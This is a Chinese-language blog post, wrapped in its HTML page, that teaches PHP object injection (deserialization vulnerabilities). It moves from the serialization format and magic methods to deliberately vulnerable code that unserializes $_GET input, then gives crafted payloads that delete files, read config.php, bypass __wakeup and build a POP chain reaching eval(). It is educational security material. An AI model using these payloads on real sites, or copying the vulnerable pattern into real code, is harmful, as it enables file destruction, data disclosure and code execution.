<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-icon-180x180.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png?v=5.1.3">






  <meta name="keywords" content="Web," />





  <link rel="alternate" href="/atom.xml" title="0xsisrazz" type="application/atom+xml" />






<meta name="description" content="php对象注入又叫做反序列化漏洞，同时对php的序列化与反序列化研究了好长时间，现在小结一下">
<meta name="keywords" content="Web">
<meta property="og:type" content="article">
<meta property="og:title" content="php对象注入">
<meta property="og:url" content="http://www.set3rnal.xyz/2016/12/06/php对象注入小结/index.html">
<meta property="og:site_name" content="0xsisrazz">
<meta property="og:description" content="php对象注入又叫做反序列化漏洞，同时对php的序列化与反序列化研究了好长时间，现在小结一下">
<meta property="og:image" content="http://i.imgur.com/VbSO53D.png">
<meta property="og:image" content="http://i.imgur.com/EftYJbd.png">
<meta property="og:updated_time" content="2017-10-29T13:22:00.432Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php对象注入">
<meta name="twitter:description" content="php对象注入又叫做反序列化漏洞，同时对php的序列化与反序列化研究了好长时间，现在小结一下">
<meta name="twitter:image" content="http://i.imgur.com/VbSO53D.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"right","offset":20,"b2t":true,"scrollpercent":"flase","onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.set3rnal.xyz/2016/12/06/php对象注入小结/"/>





  <title>php对象注入 | 0xsisrazz</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">0xsisrazz</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.set3rnal.xyz/2016/12/06/php对象注入小结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Set3rnal">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="0xsisrazz">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">php对象注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2016-12-06T10:55:43+08:00">
                2016-12-06
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2016/12/06/php对象注入小结/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2016/12/06/php对象注入小结/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>php对象注入又叫做反序列化漏洞，<br>同时对php的序列化与反序列化研究了好长时间，现在小结一下<br><a id="more"></a></p>
<h2 id="0x00-序列化与反序列化简介"><a href="#0x00-序列化与反序列化简介" class="headerlink" title="0x00 序列化与反序列化简介"></a>0x00 序列化与反序列化简介</h2><blockquote>
<p>string serialize ( mixed $value )</p>
</blockquote>
<p>php序列化函数serialize()将对象或数组转变为字符串，包含了表示 value 的字节流，便于存储或传参。unserialize()则是将序列化好的字符串作输入，返回数组或对象。序列化的危害就在于如果序列化的内容是用户可控的，那么用户就可以注入精心构造的payload。当进行发序列化的时候就有可能会出发对象中的一些魔术方法，造成意想不到的危害。</p>
<p>php不同类型变量序列化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">    $v1 = <span class="number">123</span>;</div><div class="line">    $v2 = <span class="number">1.23</span>;</div><div class="line">    $v3 = <span class="string">'123'</span>;</div><div class="line">    $v4 = <span class="keyword">true</span>;</div><div class="line">    $v5 = <span class="keyword">array</span>();</div><div class="line">    $v6 = <span class="keyword">array</span>(<span class="string">'key'</span>=&gt;<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>);</div><div class="line">    <span class="class"><span class="keyword">class</span> <span class="title">b</span></span>&#123;</div><div class="line">    &#125;</div><div class="line">    <span class="class"><span class="keyword">class</span> <span class="title">b2</span></span>&#123;</div><div class="line">        <span class="keyword">public</span> $v = <span class="string">'123'</span>;</div><div class="line">    &#125;</div><div class="line">    $v7 = <span class="keyword">new</span> b;</div><div class="line">    $v8 = <span class="keyword">new</span> b2;</div><div class="line">    $i = <span class="number">1</span>;</div><div class="line">    <span class="keyword">while</span>($i &lt; <span class="number">9</span>)&#123;</div><div class="line">        <span class="keyword">echo</span> serialize($&#123;<span class="string">'v'</span>.$i&#125;).<span class="string">"\n"</span>;</div><div class="line">        $i ++;</div><div class="line">    &#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>输出：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">i:123;               //整数类型:值;</div><div class="line">d:1.23;              //双精度类型</div><div class="line">s:3:&quot;123&quot;;           //字符串类型:字符串长度:字符串的值;</div><div class="line">b:1;              //布尔类型，0或1</div><div class="line">a:0:&#123;&#125;               //数组类型:元素个数:&#123;&#125;</div><div class="line">a:3:&#123;s:3:&quot;key&quot;;i:1;i:0;i:2;i:1;i:3;&#125;</div><div class="line">O:1:&quot;b&quot;:0:&#123;&#125;      //对象类型:类名长度:类名:属性个数:&#123;&#125;</div><div class="line">O:2:&quot;b2&quot;:1:&#123;s:1:&quot;v&quot;;s:3:&quot;123&quot;;&#125;s表示字符串；长度为1/3，值为v/123</div></pre></td></tr></table></figure></p>
<p>tips：序列化private变量和protected变量时，会出现两个不能显示的字节char(0)</p>
<p>\x00 + 类名 + \x00 + 变量名 反序列化出来的是private变量, \x00 + * + \x00 + 变量名 反序列化出来的是protected变量, 而直接变量名反序列化出来的是public变量</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">class A &#123;</div><div class="line">    private $a = &quot;a&quot;;</div><div class="line">    protected $d = &quot;d&quot;;</div><div class="line">    public $b = &quot;b&quot;;</div><div class="line">    static $c = &quot;c&quot;;</div><div class="line">&#125;</div><div class="line">$test = new A();</div><div class="line">echo serialize($test);</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>输出：</p>
<p><img src="http://i.imgur.com/VbSO53D.png" alt=""></p>
<p>这里的NUL就是char(0)</p>
<p>详细的序列化格式请参阅<a href="http://www.neatstudio.com/show-161-1.shtml" target="_blank" rel="external">http://www.neatstudio.com/show-161-1.shtml</a></p>
<h3 id="反序列举例"><a href="#反序列举例" class="headerlink" title="反序列举例"></a>反序列举例</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">    $v1 = unserialize(&apos;s:3:&quot;123&quot;;&apos;);</div><div class="line">    class b&#123;</div><div class="line">        public $v;</div><div class="line">    &#125;</div><div class="line">    $v2 = unserialize(&apos;O:1:&quot;b&quot;:1:&#123;s:1:&quot;v&quot;;s:3:&quot;123&quot;;&#125;&apos;);</div><div class="line">    var_dump($v1);</div><div class="line">    var_dump($v2);</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>输出：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">string(3) &quot;123&quot;</div><div class="line">object(b)#1 (1) &#123;</div><div class="line">  [&quot;v&quot;]=&gt;</div><div class="line">  string(3) &quot;123&quot;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<h3 id="PHP类和对象"><a href="#PHP类和对象" class="headerlink" title="PHP类和对象"></a>PHP类和对象</h3><p>对类和对象，这里总结一下。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">class Test</div><div class="line">&#123;</div><div class="line">  public $var = &quot;Hello PHP&quot;;  //定义变量</div><div class="line">  function display()&#123;  //定义方法</div><div class="line">    echo $this-&gt;var;</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line">$a = new Test; //创建实例</div><div class="line">$b = $a-&gt;display(); //输出Hello PHP</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<h4 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h4><p>php中包含了一些特殊的魔术方法（magic function），这些方法以__开头，常见的有</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">__construct()， __destruct()， __call()， __callStatic()， __get()， __set()， __isset()， __unset()， __sleep()， __wakeup()， __toString()，__invoke()， __set_state()， __clone() 和 __debugInfo()</div></pre></td></tr></table></figure>
<p>下面举个栗子，介绍下主要的魔术方法的用法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">class Test</div><div class="line">&#123;</div><div class="line">  public $var = &apos;str1&apos;;</div><div class="line">  public $var2 = &apos;str2&apos;;</div><div class="line">  public function PrintVariable()</div><div class="line">  &#123;</div><div class="line">    echo $this-&gt;var . &apos;&lt;br /&gt;&apos;;</div><div class="line">  &#125;</div><div class="line">  public function __construct() //创建对象时调用</div><div class="line">  &#123;</div><div class="line">    echo &apos;1.__construct&lt;br /&gt;&apos;;</div><div class="line">  &#125;</div><div class="line">  public function __destruct()  //代码结束时调用</div><div class="line">  &#123;</div><div class="line">    echo &apos;2.__destruct&lt;br /&gt;&apos;;</div><div class="line">  &#125;</div><div class="line">  public function __wakeup() //反序列化调用</div><div class="line">  &#123;</div><div class="line">    echo &apos;3.__wakeup&lt;br /&gt;&apos;;</div><div class="line">  &#125;</div><div class="line">  public function __sleep() //序列化时调用</div><div class="line">  &#123;</div><div class="line">    echo &apos;4.__sleep&lt;br /&gt;&apos;;</div><div class="line">    return array(&apos;var&apos;, &apos;var2&apos;);</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$obj = new Test();  //调用__construct</div><div class="line">$s = serialize($obj);  //调用__sleep</div><div class="line">print &apos;Serialized: &apos; . $s . &apos;&lt;br&gt;&apos;;  </div><div class="line">$obj2 = unserialize($s); //调用__wakeup</div><div class="line">$obj2-&gt;PrintVariable(); //调用__destruct</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>输出为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">1.__construct</div><div class="line">4.__sleep</div><div class="line">Serialized: O:4:&quot;Test&quot;:2:&#123;s:3:&quot;var&quot;;s:4:&quot;str1&quot;;s:4:&quot;var2&quot;;s:4:&quot;str2&quot;;&#125;</div><div class="line">3.__wakeup</div><div class="line">str1</div><div class="line">2.__destruct</div><div class="line">2.__destruct</div></pre></td></tr></table></figure></p>
<p>关于更多魔术方法的介绍点<a href="http://php.net/manual/zh/language.oop5.magic.php" target="_blank" rel="external">这</a></p>
<h2 id="0x01-PHP对象注入"><a href="#0x01-PHP对象注入" class="headerlink" title="0x01 PHP对象注入"></a>0x01 PHP对象注入</h2><p>因为所有的php对象序列化都与应用执行流，可用的类以及魔术方法有关。所以有很多利用的地方：</p>
<h3 id="1-destruct"><a href="#1-destruct" class="headerlink" title="1.__destruct()"></a>1.__destruct()</h3><p>例如下述代码：一个类临时将日志存储到了一个文件中。当该类的对象被销毁时，该对象不再需要这个日志文件，然后会删除该文件。\</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line">1.php:</div><div class="line">&lt;?php </div><div class="line">class LogFile</div><div class="line">&#123;</div><div class="line">    public $filename;</div><div class="line">    public function LogData($text)</div><div class="line">    &#123;</div><div class="line">        echo &apos;Log some data: &apos; . $text . &apos;&lt;br /&gt;&apos;;</div><div class="line">        file_put_contents($this-&gt;filename, $text, FILE_APPEND);</div><div class="line">    &#125;</div><div class="line"></div><div class="line">    // Destructor that deletes the log file</div><div class="line"></div><div class="line">    public function __destruct()</div><div class="line">    &#123;</div><div class="line">        echo &apos;__destruct deletes &quot;&apos; . $this-&gt;filename . &apos;&quot; file. &lt;br /&gt;&apos;;</div><div class="line">        unlink(dirname(__FILE__) . &apos;/&apos; . $this-&gt;filename);</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>简单应用：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">2.php:</div><div class="line">&lt;?php</div><div class="line">include &apos;1.php&apos;;  //上面代码所在文件名</div><div class="line">$obj = new LogFile();</div><div class="line">// 设置日志文件名，并写入日志信息</div><div class="line">$obj-&gt;filename = &apos;1.txt&apos;;</div><div class="line">$obj-&gt;LogData(&apos;Test&apos;);</div><div class="line">//程序结束，将调用析构器，文件&apos;1.txt&apos;也被删除</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>此时，我们可以找到一个允许用户提交的脚本来调用unserialize()函数达到恶意目的。<br>例如：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">3.php:</div><div class="line">&lt;?php</div><div class="line">include &apos;logfile.php&apos;;</div><div class="line">// ... 其他代码</div><div class="line">// 定义类User</div><div class="line">class User</div><div class="line">&#123;</div><div class="line">  // 类数据</div><div class="line">  public $age = 0;</div><div class="line">  public $name = &apos;&apos;;</div><div class="line">  // 打印数据</div><div class="line">  public function PrintData()</div><div class="line">  &#123;</div><div class="line">    echo &apos;User &apos; . $this-&gt;name . &apos; is &apos; . $this-&gt;age . &apos; years old. &lt;br /&gt;&apos;;</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line">// 反序列化用户提供的数据</div><div class="line">$usr = unserialize($_GET[&apos;a&apos;]);</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>正常的请求应像这样</p>
<p><code>3.php?a=O:4:&quot;User&quot;:2:{s:3:&quot;age&quot;;i:20;s:4:&quot;name&quot;;s:4:&quot;John&quot;;}</code></p>
<p>现在我们使用序列化的“LogFile”对象来制作请求：</p>
<p><code>3.php?a=O:7:&quot;LogFile&quot;:1:{s:8:&quot;filename&quot;;s:3:&quot;123&quot;;}</code><br>就会删除123文件，因为<code>__destruct</code>方法被自动调用，并且我们能够使用类“LogFile”的变量，所以我们能够将变量“filename”设置成任何值。</p>
<h3 id="2-toString"><a href="#2-toString" class="headerlink" title="2.__toString()"></a>2.__toString()</h3><p>关于<code>__toString()</code>的用法<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">class Person&#123;</div><div class="line">    private $name;</div><div class="line">    function __construct($name)&#123;</div><div class="line"></div><div class="line">        $this-&gt;name = $name;</div><div class="line">    &#125;</div><div class="line">    function say()&#123;</div><div class="line"></div><div class="line">        echo &quot;Hello,&quot;.$this-&gt;name.&quot;!&lt;br/&gt;&quot;;  </div><div class="line">    &#125;</div><div class="line">    function __tostring()&#123;//在类中定义一个__toString方法</div><div class="line">        return  &quot;Hello,&quot;.$this-&gt;name.&quot;!&lt;br/&gt;&quot;;    </div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line">$WBlog = new Person(&apos;WBlog&apos;);</div><div class="line">echo $WBlog;//直接输出对象引用，自动调用了对象中的__toString()方法</div><div class="line">$WBlog-&gt;say();//输出相同</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>漏洞代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">class FileClass&#123;</div><div class="line">  public $filename = &apos;error.log&apos;;</div><div class="line">  // 将对象用作字符串来显示文件内容</div><div class="line">  public function __toString()</div><div class="line">  &#123;</div><div class="line">    return file_get_contents($this-&gt;filename);</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$obj = unserialize($_GET[&apos;a&apos;]);</div><div class="line">// 将调用反序列化对象的__toString方法</div><div class="line">echo $obj;</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>构造恶意代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">5.php?a=O:9:&quot;FileClass&quot;:1:&#123;s:8:&quot;filename&quot;;s:10:&quot;config.php&quot;;&#125;</div></pre></td></tr></table></figure></p>
<p>此时可以访问config.php的内容</p>
<h3 id="3-再介绍一下-wakeup漏洞"><a href="#3-再介绍一下-wakeup漏洞" class="headerlink" title="3.再介绍一下__wakeup漏洞"></a>3.再介绍一下__wakeup漏洞</h3><p>前面讲过wakeup会在反序列化之后调用。<br>但是当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行<br>实例代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">    class A&#123;</div><div class="line">        function __wakeup()&#123;</div><div class="line">        echo &apos;Hello&apos;;</div><div class="line">        &#125;    </div><div class="line">    &#125;</div><div class="line">$c = new A();</div><div class="line">$v=serialize($c);</div><div class="line">$d=unserialize($v);</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>测试代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">&lt;?php  </div><div class="line">class Set3rnal&#123;  </div><div class="line">var $a = array();</div><div class="line">function __destruct()</div><div class="line">    &#123;</div><div class="line">        echo &quot;PHP\n&quot;;</div><div class="line">    &#125;</div><div class="line">    function __wakeup()</div><div class="line">    &#123;</div><div class="line">    echo &quot;hello\n&quot;;</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line">$b = new Set3rnal(array(&apos;0&apos; =&gt; Set,&apos;1&apos; =&gt; Hello,&apos;2&apos; =&gt; World));</div><div class="line">print (serialize($b));</div><div class="line">//$c = unserialize(&quot;&quot;);</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>此时输出为<code>O:8:&quot;Set3rnal&quot;:1:{s:1:&quot;a&quot;;a:0:{}}PHP</code></p>
<p>将序列化的结果改为<code>O:8:&quot;Set3rnal&quot;:2:{s:1:&quot;a&quot;;a:0:{}}</code>反序列化赋予c<br>此时报错 并没有执行<code>__wakeup()</code>出现hello<br>这里有一个sugarcrm的实例 有兴趣看<a href="http://paper.seebug.org/39/" target="_blank" rel="external">http://paper.seebug.org/39/</a> 我就不赘述了</p>
<h2 id="0x02-反序列化之-pop链"><a href="#0x02-反序列化之-pop链" class="headerlink" title="0x02 反序列化之 pop链"></a>0x02 反序列化之 pop链</h2><p>代码除了含有实现魔术函数的类，可以进行恶意攻击外，还有就是开始一个“POP链”<br>大体了解一下pop链</p>
<p>我们把魔术方法当作是最开始的gadgets，它们会调用其它的函数(gadgets)，我们通过寻找相同名字的函数，将类的属性和敏感函数的属性联系起来，即pop chain。所有的敏感属性我们都是可以控制的。</p>
<p>所以如果漏洞代码不在魔术方法中，而是在一个普通的方法中，那么可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。</p>
<p>栗子：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">    class set &#123;</div><div class="line">        protected $a;</div><div class="line"></div><div class="line">        function __construct() &#123;</div><div class="line">            $this-&gt;a = new normal();</div><div class="line">        &#125;</div><div class="line"></div><div class="line">        function __destruct() &#123;</div><div class="line">            $this-&gt;a-&gt;action();</div><div class="line">            &#125;</div><div class="line">    &#125;</div><div class="line"></div><div class="line">    class normal &#123;</div><div class="line">        function action() &#123;</div><div class="line">            echo &quot;hello&quot;;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line"></div><div class="line">    class evil &#123;</div><div class="line">        private $data;</div><div class="line">        function action() &#123;</div><div class="line">            eval($this-&gt;data);</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line"></div><div class="line">    unserialize($_GET[&apos;d&apos;]);</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>可以看出Set类是想调用normal类的action方法，但是action方法同时存在于evil类中，此时就可以构造pop链，调用evil中的action方法</p>
<p>Payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">class set &#123;</div><div class="line">    protected $a;</div><div class="line">    function __construct() &#123;</div><div class="line">        $this-&gt;a = new evil();</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line">class evil &#123;</div><div class="line">    private $data = &quot;phpinfo();&quot;;</div><div class="line"></div><div class="line">&#125;</div><div class="line">echo urlencode(serialize(new Set()));</div><div class="line">?&gt;</div><div class="line">echo:</div><div class="line"></div><div class="line">O%3A3%3A%22set%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D</div></pre></td></tr></table></figure></p>
<p><img src="http://i.imgur.com/EftYJbd.png" alt=""></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"># Web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/12/02/正则表达式笔记/" rel="next" title="正则表达式笔记">
                <i class="fa fa-chevron-left"></i> 正则表达式笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/02/14/Dword Shoot/" rel="prev" title="Dword Shoot">
                Dword Shoot <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
